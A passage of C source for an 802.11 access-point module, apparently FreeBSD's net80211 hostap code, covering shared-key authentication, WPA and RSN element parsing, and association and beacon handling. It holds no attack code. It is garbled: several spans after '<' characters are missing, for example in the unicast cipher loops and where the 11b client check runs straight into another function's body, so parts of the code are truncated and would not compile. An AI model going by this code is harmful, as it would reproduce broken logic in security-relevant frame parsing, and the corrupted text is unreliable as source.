vap->iv_stats.is_rx_bad_auth++; estatus = IEEE80211_STATUS_CHALLENGE; goto bad; } if (memcmp(ni->ni_challenge, &challenge[2], challenge[1]) != 0) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key response", "%s", "challenge mismatch"); vap->iv_stats.is_rx_auth_fail++; estatus = IEEE80211_STATUS_CHALLENGE; goto bad; } IEEE80211_NOTE(vap, IEEE80211_MSG_DEBUG | IEEE80211_MSG_AUTH, ni, "%s", "station authenticated (shared key)"); ieee80211_node_authorize(ni); break; default: IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key auth", "bad seq %d", seq); vap->iv_stats.is_rx_bad_auth++; estatus = IEEE80211_STATUS_SEQUENCE; goto bad; } IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_AUTH, seq + 1); return; bad: /* * Send an error response; but only when operating as an AP. */ /* XXX hack to workaround calling convention */ ieee80211_send_error(ni, wh->i_addr2, IEEE80211_FC0_SUBTYPE_AUTH, (seq + 1) | (estatus<<16)); } /* * Convert a WPA cipher selector OUI to an internal * cipher algorithm. Where appropriate we also * record any key length. */ static int wpa_cipher(const uint8_t *sel, uint8_t *keylen) { #define WPA_SEL(x) (((x)<<24)|WPA_OUI) uint32_t w = LE_READ_4(sel); switch (w) { case WPA_SEL(WPA_CSE_NULL): return IEEE80211_CIPHER_NONE; case WPA_SEL(WPA_CSE_WEP40): if (keylen) *keylen = 40 / NBBY; return IEEE80211_CIPHER_WEP; case WPA_SEL(WPA_CSE_WEP104): if (keylen) *keylen = 104 / NBBY; return IEEE80211_CIPHER_WEP; case WPA_SEL(WPA_CSE_TKIP): return IEEE80211_CIPHER_TKIP; case WPA_SEL(WPA_CSE_CCMP): return IEEE80211_CIPHER_AES_CCM; } return 32; /* NB: so 1<< is discarded */ #undef WPA_SEL } /* * Convert a WPA key management/authentication algorithm * to an internal code. */ static int wpa_keymgmt(const uint8_t *sel) { #define WPA_SEL(x) (((x)<<24)|WPA_OUI) uint32_t w = LE_READ_4(sel); switch (w) { case WPA_SEL(WPA_ASE_8021X_UNSPEC): return WPA_ASE_8021X_UNSPEC; case WPA_SEL(WPA_ASE_8021X_PSK): return WPA_ASE_8021X_PSK; case WPA_SEL(WPA_ASE_NONE): return WPA_ASE_NONE; } return 0; /* NB: so is discarded */ #undef WPA_SEL } /* * Parse a WPA information element to collect parameters. * Note that we do not validate security parameters; that * is handled by the authenticator; the parsing done here * is just for internal use in making operational decisions. */ static int ieee80211_parse_wpa(struct ieee80211vap *vap, const uint8_t *frm, struct ieee80211_rsnparms *rsn, const struct ieee80211_frame *wh) { uint8_t len = frm[1]; uint32_t w; int n; /* * Check the length once for fixed parts: OUI, type, * version, mcast cipher, and 2 selector counts. * Other, variable-length data, must be checked separately. */ if ((vap->iv_flags & IEEE80211_F_WPA1) == 0) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_WPA, wh, "WPA", "not WPA, flags 0x%x", vap->iv_flags); return IEEE80211_REASON_IE_INVALID; } if (len < 14) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_WPA, wh, "WPA", "too short, len %u", len); return IEEE80211_REASON_IE_INVALID; } frm += 6, len -= 4; /* NB: len is payload only */ /* NB: iswpaoui already validated the OUI and type */ w = LE_READ_2(frm); if (w != WPA_VERSION) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_WPA, wh, "WPA", "bad version %u", w); return IEEE80211_REASON_IE_INVALID; } frm += 2, len -= 2; memset(rsn, 0, sizeof(*rsn)); /* multicast/group cipher */ rsn->rsn_mcastcipher = wpa_cipher(frm, &rsn->rsn_mcastkeylen); frm += 4, len -= 4; /* unicast ciphers */ n = LE_READ_2(frm); frm += 2, len -= 2; if (len < n*4+2) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_WPA, wh, "WPA", "ucast cipher data too short; len %u, n %u", len, n); return IEEE80211_REASON_IE_INVALID; } w = 0; for (; n > 0; n--) { w |= 1<rsn_ucastkeylen); frm += 4, len -= 4; } if (w & (1<rsn_ucastcipher = IEEE80211_CIPHER_TKIP; else rsn->rsn_ucastcipher = IEEE80211_CIPHER_AES_CCM; /* key management algorithms */ n = LE_READ_2(frm); frm += 2, len -= 2; if (len < n*4) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_WPA, wh, "WPA", "key mgmt alg data too short; len %u, n %u", len, n); return IEEE80211_REASON_IE_INVALID; } w = 0; for (; n > 0; n--) { w |= wpa_keymgmt(frm); frm += 4, len -= 4; } if (w & WPA_ASE_8021X_UNSPEC) rsn->rsn_keymgmt = WPA_ASE_8021X_UNSPEC; else rsn->rsn_keymgmt = WPA_ASE_8021X_PSK; if (len > 2) /* optional capabilities */ rsn->rsn_caps = LE_READ_2(frm); return 0; } /* * Convert an RSN cipher selector OUI to an internal * cipher algorithm. Where appropriate we also * record any key length. */ static int rsn_cipher(const uint8_t *sel, uint8_t *keylen) { #define RSN_SEL(x) (((x)<<24)|RSN_OUI) uint32_t w = LE_READ_4(sel); switch (w) { case RSN_SEL(RSN_CSE_NULL): return IEEE80211_CIPHER_NONE; case RSN_SEL(RSN_CSE_WEP40): if (keylen) *keylen = 40 / NBBY; return IEEE80211_CIPHER_WEP; case RSN_SEL(RSN_CSE_WEP104): if (keylen) *keylen = 104 / NBBY; return IEEE80211_CIPHER_WEP; case RSN_SEL(RSN_CSE_TKIP): return IEEE80211_CIPHER_TKIP; case RSN_SEL(RSN_CSE_CCMP): return IEEE80211_CIPHER_AES_CCM; case RSN_SEL(RSN_CSE_WRAP): return IEEE80211_CIPHER_AES_OCB; } return 32; /* NB: so 1<< is discarded */ #undef WPA_SEL } /* * Convert an RSN key management/authentication algorithm * to an internal code. */ static int rsn_keymgmt(const uint8_t *sel) { #define RSN_SEL(x) (((x)<<24)|RSN_OUI) uint32_t w = LE_READ_4(sel); switch (w) { case RSN_SEL(RSN_ASE_8021X_UNSPEC): return RSN_ASE_8021X_UNSPEC; case RSN_SEL(RSN_ASE_8021X_PSK): return RSN_ASE_8021X_PSK; case RSN_SEL(RSN_ASE_NONE): return RSN_ASE_NONE; } return 0; /* NB: so is discarded */ #undef RSN_SEL } /* * Parse a WPA/RSN information element to collect parameters * and validate the parameters against what has been * configured for the system. */ static int ieee80211_parse_rsn(struct ieee80211vap *vap, const uint8_t *frm, struct ieee80211_rsnparms *rsn, const struct ieee80211_frame *wh) { uint8_t len = frm[1]; uint32_t w; int n; /* * Check the length once for fixed parts: * version, mcast cipher, and 2 selector counts. * Other, variable-length data, must be checked separately. */ if ((vap->iv_flags & IEEE80211_F_WPA2) == 0) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_WPA, wh, "WPA", "not RSN, flags 0x%x", vap->iv_flags); return IEEE80211_REASON_IE_INVALID; } if (len < 10) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_WPA, wh, "RSN", "too short, len %u", len); return IEEE80211_REASON_IE_INVALID; } frm += 2; w = LE_READ_2(frm); if (w != RSN_VERSION) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_WPA, wh, "RSN", "bad version %u", w); return IEEE80211_REASON_IE_INVALID; } frm += 2, len -= 2; memset(rsn, 0, sizeof(*rsn)); /* multicast/group cipher */ rsn->rsn_mcastcipher = rsn_cipher(frm, &rsn->rsn_mcastkeylen); frm += 4, len -= 4; /* unicast ciphers */ n = LE_READ_2(frm); frm += 2, len -= 2; if (len < n*4+2) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_WPA, wh, "RSN", "ucast cipher data too short; len %u, n %u", len, n); return IEEE80211_REASON_IE_INVALID; } w = 0; for (; n > 0; n--) { w |= 1<rsn_ucastkeylen); frm += 4, len -= 4; } if (w & (1<rsn_ucastcipher = IEEE80211_CIPHER_TKIP; else rsn->rsn_ucastcipher = IEEE80211_CIPHER_AES_CCM; /* key management algorithms */ n = LE_READ_2(frm); frm += 2, len -= 2; if (len < n*4) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_WPA, wh, "RSN", "key mgmt alg data too short; len %u, n %u", len, n); return IEEE80211_REASON_IE_INVALID; } w = 0; for (; n > 0; n--) { w |= rsn_keymgmt(frm); frm += 4, len -= 4; } if (w & RSN_ASE_8021X_UNSPEC) rsn->rsn_keymgmt = RSN_ASE_8021X_UNSPEC; else rsn->rsn_keymgmt = RSN_ASE_8021X_PSK; /* optional RSN capabilities */ if (len > 2) rsn->rsn_caps = LE_READ_2(frm); /* XXXPMKID */ return 0; } /* * WPA/802.11i assocation request processing. */ static int wpa_assocreq(struct ieee80211_node *ni, struct ieee80211_rsnparms *rsnparms, const struct ieee80211_frame *wh, const uint8_t *wpa, const uint8_t *rsn, uint16_t capinfo) { struct ieee80211vap *vap = ni->ni_vap; uint8_t reason; int badwparsn; ni->ni_flags &= ~(IEEE80211_NODE_WPS|IEEE80211_NODE_TSN); if (wpa == NULL && rsn == NULL) { if (vap->iv_flags_ext & IEEE80211_FEXT_WPS) { /* * W-Fi Protected Setup (WPS) permits * clients to associate and pass EAPOL frames * to establish initial credentials. */ ni->ni_flags |= IEEE80211_NODE_WPS; return 1; } if ((vap->iv_flags_ext & IEEE80211_FEXT_TSN) && (capinfo & IEEE80211_CAPINFO_PRIVACY)) { /* * Transitional Security Network. Permits clients * to associate and use WEP while WPA is configured. */ ni->ni_flags |= IEEE80211_NODE_TSN; return 1; } IEEE80211_DISCARD(vap, IEEE80211_MSG_ASSOC | IEEE80211_MSG_WPA, wh, NULL, "%s", "no WPA/RSN IE in association request"); vap->iv_stats.is_rx_assoc_badwpaie++; reason = IEEE80211_REASON_IE_INVALID; goto bad; } /* assert right association security credentials */ badwparsn = 0; /* NB: to silence compiler */ switch (vap->iv_flags & IEEE80211_F_WPA) { case IEEE80211_F_WPA1: badwparsn = (wpa == NULL); break; case IEEE80211_F_WPA2: badwparsn = (rsn == NULL); break; case IEEE80211_F_WPA1|IEEE80211_F_WPA2: badwparsn = (wpa == NULL && rsn == NULL); break; } if (badwparsn) { IEEE80211_DISCARD(vap, IEEE80211_MSG_ASSOC | IEEE80211_MSG_WPA, wh, NULL, "%s", "missing WPA/RSN IE in association request"); vap->iv_stats.is_rx_assoc_badwpaie++; reason = IEEE80211_REASON_IE_INVALID; goto bad; } /* * Parse WPA/RSN information element. */ if (wpa != NULL) reason = ieee80211_parse_wpa(vap, wpa, rsnparms, wh); else reason = ieee80211_parse_rsn(vap, rsn, rsnparms, wh); if (reason != 0) { /* XXX distinguish WPA/RSN? */ vap->iv_stats.is_rx_assoc_badwpaie++; goto bad; } IEEE80211_NOTE(vap, IEEE80211_MSG_ASSOC | IEEE80211_MSG_WPA, ni, "%s ie: mc %u/%u uc %u/%u key %u caps 0x%x", wpa != NULL ? "WPA" : "RSN", rsnparms->rsn_mcastcipher, rsnparms->rsn_mcastkeylen, rsnparms->rsn_ucastcipher, rsnparms->rsn_ucastkeylen, rsnparms->rsn_keymgmt, rsnparms->rsn_caps); return 1; bad: ieee80211_node_deauth(ni, reason); return 0; } /* XXX find a better place for definition */ struct l2_update_frame { struct ether_header eh; uint8_t dsap; uint8_t ssap; uint8_t control; uint8_t xid[3]; } __packed; /* * Deliver a TGf L2UF frame on behalf of a station. * This primes any bridge when the station is roaming * between ap's on the same wired network. */ static void ieee80211_deliver_l2uf(struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ifnet *ifp = vap->iv_ifp; struct mbuf *m; struct l2_update_frame *l2uf; struct ether_header *eh; m = m_gethdr(M_NOWAIT, MT_DATA); if (m == NULL) { IEEE80211_NOTE(vap, IEEE80211_MSG_ASSOC, ni, "%s", "no mbuf for l2uf frame"); vap->iv_stats.is_rx_nobuf++; /* XXX not right */ return; } l2uf = mtod(m, struct l2_update_frame *); eh = &l2uf->eh; /* dst: Broadcast address */ IEEE80211_ADDR_COPY(eh->ether_dhost, ifp->if_broadcastaddr); /* src: associated STA */ IEEE80211_ADDR_COPY(eh->ether_shost, ni->ni_macaddr); eh->ether_type = htons(sizeof(*l2uf) - sizeof(*eh)); l2uf->dsap = 0; l2uf->ssap = 0; l2uf->control = 0xf5; l2uf->xid[0] = 0x81; l2uf->xid[1] = 0x80; l2uf->xid[2] = 0x00; m->m_pkthdr.len = m->m_len = sizeof(*l2uf); hostap_deliver_data(vap, ni, m); } static void ratesetmismatch(struct ieee80211_node *ni, const struct ieee80211_frame *wh, int reassoc, int resp, const char *tag, int rate) { IEEE80211_NOTE_MAC(ni->ni_vap, IEEE80211_MSG_ANY, wh->i_addr2, "deny %s request, %s rate set mismatch, rate/MCS %d", reassoc ? "reassoc" : "assoc", tag, rate & IEEE80211_RATE_VAL); IEEE80211_SEND_MGMT(ni, resp, IEEE80211_STATUS_BASIC_RATE); ieee80211_node_leave(ni); } static void capinfomismatch(struct ieee80211_node *ni, const struct ieee80211_frame *wh, int reassoc, int resp, const char *tag, int capinfo) { struct ieee80211vap *vap = ni->ni_vap; IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_ANY, wh->i_addr2, "deny %s request, %s mismatch 0x%x", reassoc ? "reassoc" : "assoc", tag, capinfo); IEEE80211_SEND_MGMT(ni, resp, IEEE80211_STATUS_CAPINFO); ieee80211_node_leave(ni); vap->iv_stats.is_rx_assoc_capmismatch++; } static void htcapmismatch(struct ieee80211_node *ni, const struct ieee80211_frame *wh, int reassoc, int resp) { IEEE80211_NOTE_MAC(ni->ni_vap, IEEE80211_MSG_ANY, wh->i_addr2, "deny %s request, %s missing HT ie", reassoc ? "reassoc" : "assoc"); /* XXX no better code */ IEEE80211_SEND_MGMT(ni, resp, IEEE80211_STATUS_MISSING_HT_CAPS); ieee80211_node_leave(ni); } static void authalgreject(struct ieee80211_node *ni, const struct ieee80211_frame *wh, int algo, int seq, int status) { struct ieee80211vap *vap = ni->ni_vap; IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, NULL, "unsupported alg %d", algo); vap->iv_stats.is_rx_auth_unsupported++; ieee80211_send_error(ni, wh->i_addr2, IEEE80211_FC0_SUBTYPE_AUTH, seq | (status << 16)); } static __inline int ishtmixed(const uint8_t *ie) { const struct ieee80211_ie_htinfo *ht = (const struct ieee80211_ie_htinfo *) ie; return (ht->hi_byte2 & IEEE80211_HTINFO_OPMODE) == IEEE80211_HTINFO_OPMODE_MIXED; } static int is11bclient(const uint8_t *rates, const uint8_t *xrates) { static const uint32_t brates = (1<<2*1)|(1<<2*2)|(1<<11)|(1<<2*11); int i; /* NB: the 11b clients we care about will not have xrates */ if (xrates != NULL || rates == NULL) return 0; for (i = 0; i < rates[1]; i++) { int r = rates[2+i] & IEEE80211_RATE_VAL; if (r > 2*11 || ((1<ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_frame *wh; uint8_t *frm, *efrm, *sfrm; uint8_t *ssid, *rates, *xrates, *wpa, *rsn, *wme, *ath, *htcap; int reassoc, resp; uint8_t rate; wh = mtod(m0, struct ieee80211_frame *); frm = (uint8_t *)&wh[1]; efrm = mtod(m0, uint8_t *) + m0->m_len; switch (subtype) { case IEEE80211_FC0_SUBTYPE_PROBE_RESP: case IEEE80211_FC0_SUBTYPE_BEACON: { struct ieee80211_scanparams scan; /* * We process beacon/probe response frames when scanning; * otherwise we check beacon frames for overlapping non-ERP * BSS in 11g and/or overlapping legacy BSS when in HT. */ if ((ic->ic_flags & IEEE80211_F_SCAN) == 0 && subtype == IEEE80211_FC0_SUBTYPE_PROBE_RESP) { vap->iv_stats.is_rx_mgtdiscard++; return; } /* NB: accept off-channel frames */ if (ieee80211_parse_beacon(ni, m0, &scan) &~ IEEE80211_BPARSE_OFFCHAN) return; /* * Count frame now that we know it's to be processed. */ if (subtype == IEEE80211_FC0_SUBTYPE_BEACON) { vap->iv_stats.is_rx_beacon++; /* XXX remove */ IEEE80211_NODE_STAT(ni, rx_beacons); } else IEEE80211_NODE_STAT(ni, rx_proberesp); /* * If scanning, just pass information to the scan module. */ if (ic->ic_flags & IEEE80211_F_SCAN) { if (scan.status == 0 && /* NB: on channel */ (ic->ic_flags_ext & IEEE80211_FEXT_PROBECHAN)) { /* * Actively scanning a channel marked passive; * send a probe request now that we know there * is 802.11 traffic present. * * XXX check if the beacon we recv'd gives * us what we need and suppress the probe req */ ieee80211_probe_curchan(vap, 1); ic->ic_flags_ext &= ~IEEE80211_FEXT_PROBECHAN; } ieee80211_add_scan(vap, &scan, wh, subtype, rssi, nf); return; } /* * Check beacon for overlapping bss w/ non ERP stations. * If we detect one and protection is configured but not * enabled, enable it and start a timer that'll bring us * out if we stop seeing the bss. */ if (IEEE80211_IS_CHAN_ANYG(ic->ic_curchan) && scan.status == 0 && /* NB: on-channel */ ((scan.erp & 0x100) == 0 || /* NB: no ERP, 11b sta*/ (scan.erp & IEEE80211_ERP_NON_ERP_PRESENT))) { ic->ic_lastnonerp = ticks; ic->ic_flags_ext |= IEEE80211_FEXT_NONERP_PR; if (ic->ic_protmode != IEEE80211_PROT_NONE && (ic->ic_flags & IEEE80211_F_USEPROT) == 0) { IEEE80211_NOTE_FRAME(vap, IEEE80211_MSG_ASSOC, wh, "non-ERP present on channel %d " "(saw erp 0x%x from channel %d), " "enable use of protection", ic->ic_curchan->ic_ieee, scan.erp, scan.chan); ic->ic_flags |= IEEE80211_F_USEPROT; ieee80211_notify_erp(ic); } } /* * Check beacon for non-HT station on HT channel * and update HT BSS occupancy as appropriate. */ if (IEEE80211_IS_CHAN_HT(ic->ic_curchan)) { if (scan.status & IEEE80211_BPARSE_OFFCHAN) { /* * Off control channel; only check frames * that come in the extension channel when * operating w/ HT40. */ if (!IEEE80211_IS_CHAN_HT40(ic->ic_curchan)) break; if (scan.chan != ic->ic_curchan->ic_extieee) break; } if (scan.htinfo == NULL) { ieee80211_htprot_update(ic, IEEE80211_HTINFO_OPMODE_PROTOPT | IEEE80211_HTINFO_NONHT_PRESENT); } else if (ishtmixed(scan.htinfo)) { /* XXX? take NONHT_PRESENT from beacon? */ ieee80211_htprot_update(ic, IEEE80211_HTINFO_OPMODE_MIXED | IEEE80211_HTINFO_NONHT_PRESENT); } } break; } case IEEE80211_FC0_SUBTYPE_PROBE_REQ: if (vap->iv_state != IEEE80211_S_RUN) { vap->iv_stats.is_rx_mgtdiscard++; return; } /* * Consult the ACL policy module if setup. */ if (vap->iv_acl != NULL && !vap->iv_acl->iac_check(vap, wh)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_ACL, wh, NULL, "%s", "disallowed by ACL"); vap->iv_stats.is_rx_acl++; return; } /* * prreq frame format * [tlv] ssid * [tlv] supported rates * [tlv] extended supported rates */ ssid = rates = xrates = NULL; sfrm = frm; while (efrm - frm > 1) { IEEE80211_VERIFY_LENGTH(efrm - frm, frm[1] + 2, return); switch (*frm) { case IEEE80211_ELEMID_SSID: ssid = frm; break; case IEEE80211_ELEMID_RATES: rates = frm; break; case IEEE80211_ELEMID_XRATES: xrates = frm; break; } frm += frm[1] + 2; } IEEE80211_VERIFY_ELEMENT(rates, IEEE80211_RATE_MAXSIZE, return); if (xrates != NULL) IEEE80211_VERIFY_ELEMENT(xrates, IEEE80211_RATE_MAXSIZE - rates[1], return); IEEE80211_VERIFY_ELEMENT(ssid, IEEE80211_NWID_LEN, return); IEEE80211_VERIFY_SSID(vap->iv_bss, ssid, return); if ((vap->iv_flags & IEEE80211_F_HIDESSID) && ssid[1] == 0) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "no ssid with ssid suppression enabled"); vap->iv_stats.is_rx_ssidmismatch++; /*XXX*/ return; } /* XXX find a better class or define it's own */ IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_INPUT, wh->i_addr2, "%s", "recv probe req"); /* * Some legacy 11b clients cannot hack a complete * probe response frame. When the request includes * only a bare-bones rate set, communicate this to * the transmit side. */ ieee80211_send_proberesp(vap, wh->i_addr2, is11bclient(rates, xrates) ? IEEE80211_SEND_LEGACY_11B : 0); break; case IEEE80211_FC0_SUBTYPE_AUTH: { uint16_t algo, seq, status; if (vap->iv_state != IEEE80211_S_RUN) { vap->iv_stats.is_rx_mgtdiscard++; return; } if (!IEEE80211_ADDR_EQ(wh->i_addr3, vap->iv_bss->ni_bssid)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, NULL, "%s", "wrong bssid"); vap->iv_stats.is_rx_wrongbss++; /*XXX unique stat?*/ return; } /* * auth frame format * [2] algorithm * [2] sequence * [2] status * [tlv*] challenge */ IEEE80211_VERIFY_LENGTH(efrm - frm, 6, return); algo = le16toh(*(uint16_t *)frm); seq = le16toh(*(uint16_t *)(frm + 2)); status = le16toh(*(uint16_t *)(frm + 4)); IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_AUTH, wh->i_addr2, "recv auth frame with algorithm %d seq %d", algo, seq); /* * Consult the ACL policy module if setup. */ if (vap->iv_acl != NULL && !vap->iv_acl->iac_check(vap, wh)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_ACL, wh, NULL, "%s", "disallowed by ACL"); vap->iv_stats.is_rx_acl++; ieee80211_send_error(ni, wh->i_addr2, IEEE80211_FC0_SUBTYPE_AUTH, (seq+1) | (IEEE80211_STATUS_UNSPECIFIED<<16)); return; } if (vap->iv_flags & IEEE80211_F_COUNTERM) { IEEE80211_DISCARD(vap, IEEE80211_MSG_AUTH | IEEE80211_MSG_CRYPTO, wh, NULL, "%s", "TKIP countermeasures enabled"); vap->iv_stats.is_rx_auth_countermeasures++; ieee80211_send_error(ni, wh->i_addr2, IEEE80211_FC0_SUBTYPE_AUTH, IEEE80211_REASON_MIC_FAILURE); return; } if (algo == IEEE80211_AUTH_ALG_SHARED) hostap_auth_shared(ni, wh, frm + 6, efrm, rssi, nf, seq, status); else if (algo == IEEE80211_AUTH_ALG_OPEN) hostap_auth_open(ni, wh, rssi, nf, seq, status); else if (algo == IEEE80211_AUTH_ALG_LEAP) { authalgreject(ni, wh, algo, seq+1, IEEE80211_STATUS_ALG); return; } else { /* * We assume that an unknown algorithm is the result * of a decryption failure on a shared key auth frame; * return a status code appropriate for that instead * of IEEE80211_STATUS_ALG. * * NB: a seq# of 4 is intentional; the decrypted * frame likely has a bogus seq value. */ authalgreject(ni, wh, algo, 4, IEEE80211_STATUS_CHALLENGE); return; } break; } case IEEE80211_FC0_SUBTYPE_ASSOC_REQ: case IEEE80211_FC0_SUBTYPE_REASSOC_REQ: { uint16_t capinfo, lintval; struct ieee80211_rsnparms rsnparms; if (vap->iv_state != IEEE80211_S_RUN) { vap->iv_stats.is_rx_mgtdiscard++; return; } if (!IEEE80211_ADDR_EQ(wh->i_addr3, vap->iv_bss->ni_bssid)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, NULL, "%s", "wrong bssid"); vap->iv_stats.is_rx_assoc_bss++; return; } if (subtype == IEEE80211_FC0_SUBTYPE_REASSOC_REQ) { reassoc = 1; resp = IEEE80211_FC0_SUBTYPE_REASSOC_RESP; } else { reassoc = 0; resp = IEEE80211_FC0_SUBTYPE_ASSOC_RESP; } if (ni == vap->iv_bss) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_ANY, wh->i_addr2, "deny %s request, sta not authenticated", reassoc ? "reassoc" : "assoc"); ieee80211_send_error(ni, wh->i_addr2, IEEE80211_FC0_SUBTYPE_DEAUTH, IEEE80211_REASON_ASSOC_NOT_AUTHED); vap->iv_stats.is_rx_assoc_notauth++; return; } /* * asreq frame format * [2] capability information * [2] listen interval * [6*] current AP address (reassoc only) * [tlv] ssid * [tlv] supported rates * [tlv] extended supported rates * [tlv] WPA or RSN * [tlv] HT capabilities * [tlv] Atheros capabilities */ IEEE80211_VERIFY_LENGTH(efrm - frm, (reassoc ? 10 : 4), return); capinfo = le16toh(*(uint16_t *)frm); frm += 2; lintval = le16toh(*(uint16_t *)frm); frm += 2; if (reassoc) frm += 6; /* ignore current AP info */ ssid = rates = xrates = wpa = rsn = wme = ath = htcap = NULL; sfrm = frm; while (efrm - frm > 1) { IEEE80211_VERIFY_LENGTH(efrm - frm, frm[1] + 2, return); switch (*frm) { case IEEE80211_ELEMID_SSID: ssid = frm; break; case IEEE80211_ELEMID_RATES: rates = frm; break; case IEEE80211_ELEMID_XRATES: xrates = frm; break; case IEEE80211_ELEMID_RSN: rsn = frm; break; case IEEE80211_ELEMID_HTCAP: htcap = frm; break; case IEEE80211_ELEMID_VENDOR: if (iswpaoui(frm)) wpa = frm; else if (iswmeinfo(frm)) wme = frm; #ifdef IEEE80211_SUPPORT_SUPERG else if (isatherosoui(frm)) ath = frm; #endif else if (vap->iv_flags_ht & IEEE80211_FHT_HTCOMPAT) { if (ishtcapoui(frm) && htcap == NULL) htcap = frm; } break; } frm += frm[1] + 2; } IEEE80211_VERIFY_ELEMENT(rates, IEEE80211_RATE_MAXSIZE, return); if (xrates != NULL) IEEE80211_VERIFY_ELEMENT(xrates, IEEE80211_RATE_MAXSIZE - rates[1], return); IEEE80211_VERIFY_ELEMENT(ssid, IEEE80211_NWID_LEN, return); IEEE80211_VERIFY_SSID(vap->iv_bss, ssid, return); if (htcap != NULL) { IEEE80211_VERIFY_LENGTH(htcap[1], htcap[0] == IEEE80211_ELEMID_VENDOR ? 4 + sizeof(struct ieee80211_ie_htcap)-2 : sizeof(struct ieee80211_ie_htcap)-2, return); /* XXX just NULL out? */ } if ((vap->iv_flags & IEEE80211_F_WPA) && !wpa_assocreq(ni, &rsnparms, wh, wpa, rsn, capinfo)) return; /* discard challenge after association */ if (ni->ni_challenge != NULL) { free(ni->ni_challenge, M_80211_NODE); ni->ni_challenge = NULL; } /* NB: 802.11 spec says to ignore station's privacy bit */ if ((capinfo & IEEE80211_CAPINFO_ESS) == 0) { capinfomismatch(ni, wh, reassoc, resp, "capability", capinfo); return; } /* * Disallow re-associate w/ invalid slot time setting. */ if (ni->ni_associd != 0 && IEEE80211_IS_CHAN_ANYG(ic->ic_bsschan) && ((ni->ni_capinfo ^ capinfo) & IEEE80211_CAPINFO_SHORT_SLOTTIME)) { capinfomismatch(ni, wh, reassoc, resp, "slot time", capinfo); return; } rate = ieee80211_setup_rates(ni, rates, xrates, IEEE80211_F_DOSORT | IEEE80211_F_DOFRATE | IEEE80211_F_DONEGO | IEEE80211_F_DODEL); if (rate & IEEE80211_RATE_BASIC) { ratesetmismatch(ni, wh, reassoc, resp, "legacy", rate); vap->iv_stats.is_rx_assoc_norate++; return; } /* * If constrained to 11g-only stations reject an * 11b-only station. We cheat a bit here by looking * at the max negotiated xmit rate and assuming anyone * with a best rate <24Mb/s is an 11b station. */ if ((vap->iv_flags & IEEE80211_F_PUREG) && rate < 48) { ratesetmismatch(ni, wh, reassoc, resp, "11g", rate); vap->iv_stats.is_rx_assoc_norate++; return; } /* * Do HT rate set handling and setup HT node state. */ ni->ni_chan = vap->iv_bss->ni_chan; if (IEEE80211_IS_CHAN_HT(ni->ni_chan) && htcap != NULL) { rate = ieee80211_setup_htrates(ni, htcap, IEEE80211_F_DOFMCS | IEEE80211_F_DONEGO | IEEE80211_F_DOBRS); if (rate & IEEE80211_RATE_BASIC) { ratesetmismatch(ni, wh, reassoc, resp, "HT", rate); vap->iv_stats.is_ht_assoc_norate++; return; } ieee80211_ht_node_init(ni); ieee80211_ht_updatehtcap(ni, htcap); } else if (ni->ni_flags & IEEE80211_NODE_HT) ieee80211_ht_node_cleanup(ni); #ifdef IEEE80211_SUPPORT_SUPERG else if (ni->ni_ath_flags & IEEE80211_NODE_ATH) ieee80211_ff_node_cleanup(ni); #endif /* * Allow AMPDU operation only with unencrypted traffic * or AES-CCM; the 11n spec only specifies these ciphers * so permitting any others is undefined and can lead * to interoperability problems. */ if ((ni->ni_flags & IEEE80211_NODE_HT) && (((vap->iv_flags & IEEE80211_F_WPA) && rsnparms.rsn_ucastcipher != IEEE80211_CIPHER_AES_CCM) || (vap->iv_flags & (IEEE80211_F_WPA|IEEE80211_F_PRIVACY)) == IEEE80211_F_PRIVACY)) { IEEE80211_NOTE(vap, IEEE80211_MSG_ASSOC | IEEE80211_MSG_11N, ni, "disallow HT use because WEP or TKIP requested, " "capinfo 0x%x ucastcipher %d", capinfo, rsnparms.rsn_ucastcipher); ieee80211_ht_node_cleanup(ni); vap->iv_stats.is_ht_assoc_downgrade++; } /* * If constrained to 11n-only stations reject legacy stations. */ if ((vap->iv_flags_ht & IEEE80211_FHT_PUREN) && (ni->ni_flags & IEEE80211_NODE_HT) == 0) { htcapmismatch(ni, wh, reassoc, resp); vap->iv_stats.is_ht_assoc_nohtcap++; return; } IEEE80211_RSSI_LPF(ni->ni_avgrssi, rssi); ni->ni_noise = nf; ni->ni_intval = lintval; ni->ni_capinfo = capinfo; ni->ni_fhdwell = vap->iv_bss->ni_fhdwell; ni->ni_fhindex = vap->iv_bss->ni_fhindex; /* * Store the IEs. * XXX maybe better to just expand */ if (ieee80211_ies_init(&ni->ni_ies, sfrm, efrm - sfrm)) { #define setie(_ie, _off) ieee80211_ies_setie(ni->ni_ies, _ie, _off) if (wpa != NULL) setie(wpa_ie, wpa - sfrm); if (rsn != NULL) setie(rsn_ie, rsn - sfrm); if (htcap != NULL) setie(htcap_ie, htcap - sfrm); if (wme != NULL) { setie(wme_ie, wme - sfrm); /* * Mark node as capable of QoS. */ ni->ni_flags |= 